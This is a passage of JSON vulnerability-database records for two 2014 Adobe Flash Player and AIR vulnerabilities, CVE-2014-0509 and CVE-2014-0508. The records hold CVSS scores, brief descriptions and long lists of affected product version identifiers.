"obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0509"], "modified": "2017-12-16T02:29:00", "cpe": ["cpe:/a:adobe:adobe_air:2.7.0.19480", "cpe:/a:adobe:adobe_air_sdk:3.8.0.870", "cpe:/a:adobe:flash_player:11.5.502.110", "cpe:/a:adobe:flash_player:12.0.0.38", "cpe:/a:adobe:adobe_air:3.8.0.910", "cpe:/a:adobe:adobe_air:3.3.0.3670", "cpe:/a:adobe:flash_player:11.1.115.54", "cpe:/a:adobe:adobe_air:3.4.0.2710", "cpe:/a:adobe:flash_player:11.6.602.167", "cpe:/a:adobe:flash_player:11.2.202.228", "cpe:/a:adobe:adobe_air:3.8.0.870", "cpe:/a:adobe:flash_player:11.2.202.291", "cpe:/a:adobe:flash_player:11.4.402.287", "cpe:/a:adobe:flash_player:11.3.300.270", "cpe:/a:adobe:flash_player:11.2.202.346", "cpe:/a:adobe:flash_player:11.0.1.152", "cpe:/a:adobe:adobe_air:3.5.0.1060", "cpe:/a:adobe:adobe_air:2.7.1", "cpe:/a:adobe:adobe_air:2.6.0.19120", "cpe:/a:adobe:flash_player:11.1.111.8", "cpe:/a:adobe:flash_player:11.2.202.238", "cpe:/a:adobe:flash_player:11.7.700.202", "cpe:/a:adobe:flash_player:11.8.800.94", "cpe:/a:adobe:adobe_air:3.5.0.890", "cpe:/a:adobe:flash_player:11.7.700.232", "cpe:/a:adobe:adobe_air_sdk:3.8.0.1430", "cpe:/a:adobe:flash_player:11.1.111.44", "cpe:/a:adobe:flash_player:11.2.202.335", "cpe:/a:adobe:flash_player:11.1.115.7", "cpe:/a:adobe:adobe_air:2.7.0.19530", "cpe:/a:adobe:adobe_air_sdk:3.5.0.1060", "cpe:/a:adobe:flash_player:11.2.202.261", "cpe:/a:adobe:adobe_air:3.5.0.600", "cpe:/a:adobe:flash_player:11.7.700.242", "cpe:/a:adobe:flash_player:11.1.115.58", "cpe:/a:adobe:adobe_air:3.1.0.4880", "cpe:/a:adobe:adobe_air:2.6", "cpe:/a:adobe:adobe_air:1.1", "cpe:/a:adobe:flash_player:11.7.700.260", "cpe:/a:adobe:flash_player:11.1.102.63", "cpe:/a:adobe:adobe_air_sdk:3.9.0.1030", "cpe:/a:adobe:adobe_air_sdk:3.8.0.910", "cpe:/a:adobe:flash_player:11.2.202.236", "cpe:/a:adobe:adobe_air_sdk:3.9.0.1210", "cpe:/a:adobe:flash_player:11.0.1.153", "cpe:/a:adobe:flash_player:11.3.300.273", "cpe:/a:adobe:flash_player:11.3.300.262", "cpe:/a:adobe:adobe_air:1.5.1.8210", "cpe:/a:adobe:adobe_air:4.0.0.1390", "cpe:/a:adobe:flash_player:11.1.102.55", "cpe:/a:adobe:adobe_air_sdk:3.3.0.3690", "cpe:/a:adobe:adobe_air:2.0.4", "cpe:/a:adobe:flash_player:11.2.202.332", "cpe:/a:adobe:adobe_air_sdk:3.6.0.599", "cpe:/a:adobe:adobe_air:3.2.0.2070", "cpe:/a:adobe:flash_player:11.7.700.224", "cpe:/a:adobe:adobe_air:3.1.0.485", "cpe:/a:adobe:adobe_air:2.6.0.19140", "cpe:/a:adobe:flash_player:11.2.202.285", "cpe:/a:adobe:adobe_air:3.2.0.207", "cpe:/a:adobe:adobe_air:2.0.2", "cpe:/a:adobe:adobe_air:2.0.3.13070", "cpe:/a:adobe:flash_player:11.2.202.243", "cpe:/a:adobe:flash_player:11.5.502.149", "cpe:/a:adobe:flash_player:11.2.202.223", "cpe:/a:adobe:flash_player:11.2.202.336", "cpe:/a:adobe:adobe_air_sdk:3.9.0.1380", "cpe:/a:adobe:adobe_air_sdk:3.6.0.6090", "cpe:/a:adobe:flash_player:11.5.502.146", "cpe:/a:adobe:flash_player:11.6.602.168", "cpe:/a:adobe:adobe_air_sdk:3.5.0.880", "cpe:/a:adobe:adobe_air_sdk:3.7.0.1530", "cpe:/a:adobe:adobe_air:2.7.0.1953", "cpe:/a:adobe:adobe_air:3.9.0.1060", "cpe:/a:adobe:adobe_air:3.9.0.1380", "cpe:/a:adobe:adobe_air:2.7.1.19610", "cpe:/a:adobe:flash_player:11.6.602.180", "cpe:/a:adobe:flash_player:11.2.202.258", "cpe:/a:adobe:adobe_air:3.7.0.2090", "cpe:/a:adobe:adobe_air:2.5.0.16600", "cpe:/a:adobe:adobe_air:1.5.3.9120", "cpe:/a:adobe:flash_player:12.0.0.43", "cpe:/a:adobe:adobe_air:3.6.0.6090", "cpe:/a:adobe:flash_player:11.1.115.34", "cpe:/a:adobe:adobe_air:3.9.0.1210", "cpe:/a:adobe:adobe_air:2.0.2.12610", "cpe:/a:adobe:adobe_air:3.9.0.1030", "cpe:/a:adobe:flash_player:11.2.202.270", "cpe:/a:adobe:flash_player:11.5.502.136", "cpe:/a:adobe:adobe_air_sdk:3.1.0.488", "cpe:/a:adobe:adobe_air_sdk:3.0.0.4080", "cpe:/a:adobe:flash_player:11.2.202.310", "cpe:/a:adobe:flash_player:11.1.111.50", "cpe:/a:adobe:flash_player:11.1.115.48", "cpe:/a:adobe:flash_player:11.1.102.59", "cpe:/a:adobe:flash_player:11.9.900.170", "cpe:/a:adobe:adobe_air:1.0", "cpe:/a:adobe:adobe_air:2.7", "cpe:/a:adobe:flash_player:11.8.800.168", "cpe:/a:adobe:adobe_air:3.0.0.408", "cpe:/a:adobe:adobe_air:1.0.8.4990", "cpe:/a:adobe:adobe_air:2.0.3", "cpe:/a:adobe:flash_player:11.3.300.265", "cpe:/a:adobe:adobe_air:3.6.0.597", "cpe:/a:adobe:flash_player:11.4.402.278", "cpe:/a:adobe:adobe_air:3.7.0.1860", "cpe:/a:adobe:adobe_air_sdk:3.7.0.2090", "cpe:/a:adobe:adobe_air_sdk:3.4.0.2540", "cpe:/a:adobe:adobe_air:1.5.1", "cpe:/a:adobe:adobe_air_sdk:3.2.0.2070", "cpe:/a:adobe:adobe_air:1.5.3.9130", "cpe:/a:adobe:flash_player:11.0", "cpe:/a:adobe:adobe_air_sdk:4.0.0.1390", "cpe:/a:adobe:flash_player:11.1.102.62", "cpe:/a:adobe:flash_player:11.3.300.268", "cpe:/a:adobe:adobe_air_sdk:3.5.0.890", "cpe:/a:adobe:adobe_air_sdk:3.4.0.2710", "cpe:/a:adobe:adobe_air:1.5.2", "cpe:/a:adobe:flash_player:11.8.800.97", "cpe:/a:adobe:adobe_air_sdk:3.3.0.3650", "cpe:/a:adobe:adobe_air:3.5.0.880", "cpe:/a:adobe:flash_player:11.2.202.262", "cpe:/a:adobe:adobe_air:3.4.0.2540", "cpe:/a:adobe:flash_player:11.1.111.54", "cpe:/a:adobe:adobe_air:1.0.4990", "cpe:/a:adobe:adobe_air:1.5.0.7220", "cpe:/a:adobe:flash_player:11.2.202.273", "cpe:/a:adobe:flash_player:11.3.300.271", "cpe:/a:adobe:adobe_air:3.0.0.4080", "cpe:/a:adobe:adobe_air_sdk:3.7.0.1860", "cpe:/a:adobe:flash_player:11.2.202.275", "cpe:/a:adobe:flash_player:12.0.0.41", "cpe:/a:adobe:adobe_air:1.5.3", "cpe:/a:adobe:flash_player:11.2.202.327", "cpe:/a:adobe:adobe_air:3.1.0.488", "cpe:/a:adobe:adobe_air_sdk:3.5.0.600", "cpe:/a:adobe:flash_player:11.7.700.257", "cpe:/a:adobe:adobe_air:1.5", "cpe:/a:adobe:flash_player:11.3.300.257", "cpe:/a:adobe:flash_player:11.7.700.252", "cpe:/a:adobe:flash_player:11.2.202.251", "cpe:/a:adobe:adobe_air_sdk:4.0.0.1628", "cpe:/a:adobe:flash_player:11.9.900.152", "cpe:/a:adobe:flash_player:11.9.900.117", "cpe:/a:adobe:flash_player:11.1", "cpe:/a:adobe:adobe_air:1.0.1", "cpe:/a:adobe:flash_player:11.2.202.280", "cpe:/a:adobe:flash_player:11.2.202.235", "cpe:/a:adobe:flash_player:11.5.502.135", "cpe:/a:adobe:adobe_air:1.1.0.5790", "cpe:/a:adobe:flash_player:11.2.202.341", "cpe:/a:adobe:adobe_air:2.7.0.1948", "cpe:/a:adobe:flash_player:11.7.700.169", "cpe:/a:adobe:flash_player:11.2.202.297", "cpe:/a:adobe:flash_player:11.2.202.233", "cpe:/a:adobe:adobe_air:2.5.1.17730", "cpe:/a:adobe:adobe_air:3.7.0.1530", "cpe:/a:adobe:flash_player:11.4.402.265", "cpe:/a:adobe:flash_player:11.6.602.171"], "id": "CVE-2014-0509", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0509", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:adobe:flash_player:11.2.202.243:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:3.9.0.1030:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:2.6:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.3.300.268:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.7.700.232:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.2.202.341:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air_sdk:3.9.0.1380:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.1.115.48:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.5.502.149:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air_sdk:3.8.0.1430:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.9.900.152:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.7.700.169:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.2.202.291:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.2.202.273:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air_sdk:3.4.0.2710:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.1.102.55:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air_sdk:3.7.0.1530:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:3.9.0.1060:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:2.5.0.16600:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.1.115.34:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:2.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:3.5.0.600:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:2.7:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.4.402.287:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:1.5.3:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.8.800.97:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.3.300.270:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:3.8.0.870:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.3.300.273:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:3.8.0.910:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.7.700.260:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air_sdk:3.8.0.910:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.2.202.346:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.0.1.153:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:12.0.0.43:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:2.7.1.19610:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.2.202.332:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air_sdk:3.3.0.3690:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:2.7.0.19480:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air_sdk:3.5.0.890:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:3.2.0.2070:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:1.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.2.202.280:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.7.700.242:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.6.602.180:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.8.800.168:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.3.300.262:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:1.5.1:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.2.202.327:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.2.202.335:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air_sdk:3.5.0.600:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:1.5.1.8210:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.2.202.270:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.2.202.235:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.6.602.168:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.5.502.135:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.5.502.110:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:2.6.0.19120:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:3.1.0.488:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air_sdk:3.2.0.2070:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air_sdk:3.4.0.2540:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.1.115.7:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.1.111.54:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:1.0.4990:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.1.111.50:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.9.900.117:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:3.6.0.6090:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.5.502.136:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:3.2.0.207:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.3.300.257:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.6.602.167:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.2.202.236:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air_sdk:3.0.0.4080:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:2.7.0.1953:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:3.6.0.597:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.1.115.58:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.2.202.285:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:1.1:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.7.700.252:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.7.700.224:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:4.0.0.1390:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.2.202.258:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.1.102.63:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air_sdk:4.0.0.1628:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:12.0.0.38:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.6.602.171:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.2.202.228:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:1.5.3.9130:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air_sdk:3.9.0.1030:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.7.700.257:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.2.202.238:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.2.202.336:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.4.402.265:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.2.202.251:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.2.202.310:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.8.800.94:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:3.3.0.3670:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air_sdk:3.6.0.6090:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:3.9.0.1210:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.4.402.278:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.1.102.62:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air_sdk:3.1.0.488:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air_sdk:3.5.0.880:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.0.1.152:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.1.111.8:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:2.7.0.1948:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.2.202.275:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:1.1.0.5790:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air_sdk:3.7.0.2090:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:2.0.3.13070:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:3.5.0.890:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air_sdk:3.5.0.1060:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:2.5.1.17730:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:3.1.0.4880:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air_sdk:3.9.0.1210:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:1.0.8.4990:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:1.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.1.102.59:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:3.4.0.2710:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.2.202.233:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:2.7.1:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:2.0.2.12610:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.3.300.271:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:1.5.0.7220:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:2.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.9.900.170:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:3.5.0.880:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:2.7.0.19530:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.3.300.265:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:3.7.0.1860:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air_sdk:4.0.0.1390:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air_sdk:3.7.0.1860:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:2.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.2.202.297:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:1.5.2:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.7.700.202:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air_sdk:3.3.0.3650:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:3.0.0.4080:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air_sdk:3.8.0.870:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.1.111.44:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.5.502.146:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:3.7.0.1530:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:3.5.0.1060:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.1:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:3.9.0.1380:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:3.1.0.485:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.1.115.54:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.2.202.261:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:2.6.0.19140:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:1.5:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:3.4.0.2540:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.2.202.223:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air_sdk:3.6.0.599:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:1.5.3.9120:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.2.202.262:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:3.7.0.2090:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:12.0.0.41:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:3.0.0.408:*:*:*:*:*:*:*"]}, {"lastseen": "2023-09-20T13:53:18", "description": "Adobe Flash Player before 11.7.700.275 and 11.8.x through 13.0.x before 13.0.0.182 on Windows and OS X and before 11.2.202.350 on Linux, Adobe AIR before 13.0.0.83 on Android, Adobe AIR SDK before 13.0.0.83, and Adobe AIR SDK & Compiler before 13.0.0.83 allow attackers to bypass intended access restrictions and obtain sensitive information via unspecified vectors.", "cvss3": {}, "published": "2014-04-08T23:55:00", "type": "cve", "title": "CVE-2014-0508", "cwe": ["CWE-264"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0508"], "modified": "2017-12-16T02:29:00", "cpe": ["cpe:/a:adobe:adobe_air:2.7.0.19480", "cpe:/a:adobe:adobe_air_sdk:3.8.0.870", "cpe:/a:adobe:flash_player:11.5.502.110", "cpe:/a:adobe:flash_player:12.0.0.38", "cpe:/a:adobe:adobe_air:3.8.0.910", "cpe:/a:adobe:adobe_air:3.3.0.3670", "cpe:/a:adobe:flash_player:11.1.115.54", "cpe:/a:adobe:adobe_air:3.4.0.2710", "cpe:/a:adobe:flash_player:11.6.602.167", "cpe:/a:adobe:flash_player:11.2.202.228", "cpe:/a:adobe:adobe_air:3.8.0.870", "cpe:/a:adobe:flash_player:11.2.202.291", "cpe:/a:adobe:flash_player:11.4.402.287", "cpe:/a:adobe:flash_player:11.3.300.270", "cpe:/a:adobe:flash_player:11.2.202.346", "cpe:/a:adobe:adobe_air:2.7.1", "cpe:/a:adobe:adobe_air:3.5.0.1060", "cpe:/a:adobe:flash_player:11.0.1.152", "cpe:/a:adobe:adobe_air:2.6.0.19120", "cpe:/a:adobe:flash_player:11.1.111.8", "cpe:/a:adobe:flash_player:11.2.202.238", "cpe:/a:adobe:flash_player:11.7.700.202", "cpe:/a:adobe:flash_player:11.8.800.94", "cpe:/a:adobe:adobe_air:3.5.0.890", "cpe:/a:adobe:adobe_air_sdk:3.8.0.1430", "cpe:/a:adobe:flash_player:11.7.700.232", "cpe:/a:adobe:flash_player:11.1.111.44", "cpe:/a:adobe:flash_player:11.2.202.335", "cpe:/a:adobe:flash_player:11.1.115.7", "cpe:/a:adobe:adobe_air:2.7.0.19530", "cpe:/a:adobe:adobe_air_sdk:3.5.0.1060", "cpe:/a:adobe:flash_player:11.2.202.261", "cpe:/a:adobe:adobe_air:3.5.0.600", "cpe:/a:adobe:flash_player:11.7.700.242", "cpe:/a:adobe:flash_player:11.1.115.58", "cpe:/a:adobe:adobe_air:3.1.0.4880", "cpe:/a:adobe:adobe_air:2.6", "cpe:/a:adobe:adobe_air:1.1", "cpe:/a:adobe:adobe_air_sdk:3.9.0.1030", "cpe:/a:adobe:flash_player:11.1.102.63", "cpe:/a:adobe:adobe_air_sdk:3.8.0.910", "cpe:/a:adobe:flash_player:11.7.700.260", "cpe:/a:adobe:flash_player:11.2.202.236", "cpe:/a:adobe:adobe_air_sdk:3.9.0.1210", "cpe:/a:adobe:flash_player:11.0.1.153", "cpe:/a:adobe:flash_player:11.3.300.273", "cpe:/a:adobe:flash_player:11.3.300.262", "cpe:/a:adobe:adobe_air:1.5.1.8210", "cpe:/a:adobe:adobe_air:4.0.0.1390", "cpe:/a:adobe:flash_player:11.1.102.55", "cpe:/a:adobe:adobe_air_sdk:3.3.0.3690", "cpe:/a:adobe:adobe_air:2.0.4", "cpe:/a:adobe:flash_player:11.2.202.332", "cpe:/a:adobe:adobe_air_sdk:3.6.0.599", "cpe:/a:adobe:adobe_air:3.2.0.2070", "cpe:/a:adobe:adobe_air:3.1.0.485", "cpe:/a:adobe:adobe_air:2.6.0.19140", "cpe:/a:adobe:adobe_air:3.2.0.207", "cpe:/a:adobe:flash_player:11.2.202.285", "cpe:/a:adobe:flash_player:11.7.700.224", "cpe:/a:adobe:adobe_air:2.0.2", "cpe:/a:adobe:adobe_air:2.0.3.13070", "cpe:/a:adobe:flash_player:11.2.202.243", "cpe:/a:adobe:flash_player:11.5.502.149", "cpe:/a:adobe:adobe_air_sdk:3.9.0.1380", "cpe:/a:adobe:flash_player:11.2.202.223", "cpe:/a:adobe:flash_player:11.2.202.336", "cpe:/a:adobe:adobe_air_sdk:3.6.0.6090", "cpe:/a:adobe:flash_player:11.5.502.146", "cpe:/a:adobe:adobe_air_sdk:3.5.0.880", "cpe:/a:adobe:flash_player:11.6.602.168", "cpe:/a:adobe:adobe_air_sdk:3.7.0.1530", "cpe:/a:adobe:adobe_air:2.7.0.1953", "cpe:/a:adobe:adobe_air:3.9.0.1060", "cpe:/a:adobe:adobe_air:3.9.0.1380", "cpe:/a:adobe:adobe_air:2.7.1.19610", "cpe:/a:adobe:adobe_air:3.7.0.2090", "cpe:/a:adobe:flash_player:11.2.202.258", "cpe:/a:adobe:flash_player:11.6.602.180", "cpe:/a:adobe:adobe_air:2.5.0.16600", "cpe:/a:adobe:adobe_air:1.5.3.9120", "cpe:/a:adobe:adobe_air:3.6.0.6090", "cpe:/a:adobe:flash_player:12.0.0.43", "cpe:/a:adobe:adobe_air:3.9.0.1210", "cpe:/a:adobe:adobe_air:2.0.2.12610", "cpe:/a:adobe:flash_player:11.1.115.34", "cpe:/a:adobe:adobe_air:3.9.0.1030", "cpe:/a:adobe:flash_player:11.2.202.270", "cpe:/a:adobe:adobe_air_sdk:3.1.0.488", "cpe:/a:adobe:flash_player:11.5.502.136", "cpe:/a:adobe:adobe_air_sdk:3.0.0.4080", "cpe:/a:adobe:flash_player:11.2.202.310", "cpe:/a:adobe:flash_player:11.1.111.50", "cpe:/a:adobe:flash_player:11.1.115.48", "cpe:/a:adobe:flash_player:11.1.102.59", "cpe:/a:adobe:adobe_air:1.0", "cpe:/a:adobe:adobe_air:3.0.0.408", "cpe:/a:adobe:adobe_air:2.7", "cpe:/a:adobe:flash_player:11.8.800.168", "cpe:/a:adobe:flash_player:11.9.900.170", "cpe:/a:adobe:adobe_air:1.0.8.4990", "cpe:/a:adobe:adobe_air:2.0.3", "cpe:/a:adobe:flash_player:11.3.300.265", "cpe:/a:adobe:adobe_air:3.6.0.597", "cpe:/a:adobe:flash_player:11.4.402.278", "cpe:/a:adobe:adobe_air:3.7.0.1860", "cpe:/a:adobe:adobe_air_sdk:3.7.0.2090", "cpe:/a:adobe:adobe_air_sdk:3.4.0.2540", "cpe:/a:adobe:adobe_air_sdk:3.2.0.2070", "cpe:/a:adobe:adobe_air:1.5.1", "cpe:/a:adobe:adobe_air:1.5.3.9130", "cpe:/a:adobe:flash_player:11.0", "cpe:/a:adobe:adobe_air_sdk:4.0.0.1390", "cpe:/a:adobe:adobe_air_sdk:3.5.0.890", "cpe:/a:adobe:flash_player:11.1.102.62", "cpe:/a:adobe:flash_player:11.3.300.268", "cpe:/a:adobe:adobe_air_sdk:3.4.0.2710", "cpe:/a:adobe:adobe_air:1.5.2", "cpe:/a:adobe:flash_player:11.8.800.97", "cpe:/a:adobe:adobe_air_sdk:3.3.0.3650", "cpe:/a:adobe:adobe_air:3.5.0.880", "cpe:/a:adobe:flash_player:11.2.202.262", "cpe:/a:adobe:adobe_air:3.4.0.2540", 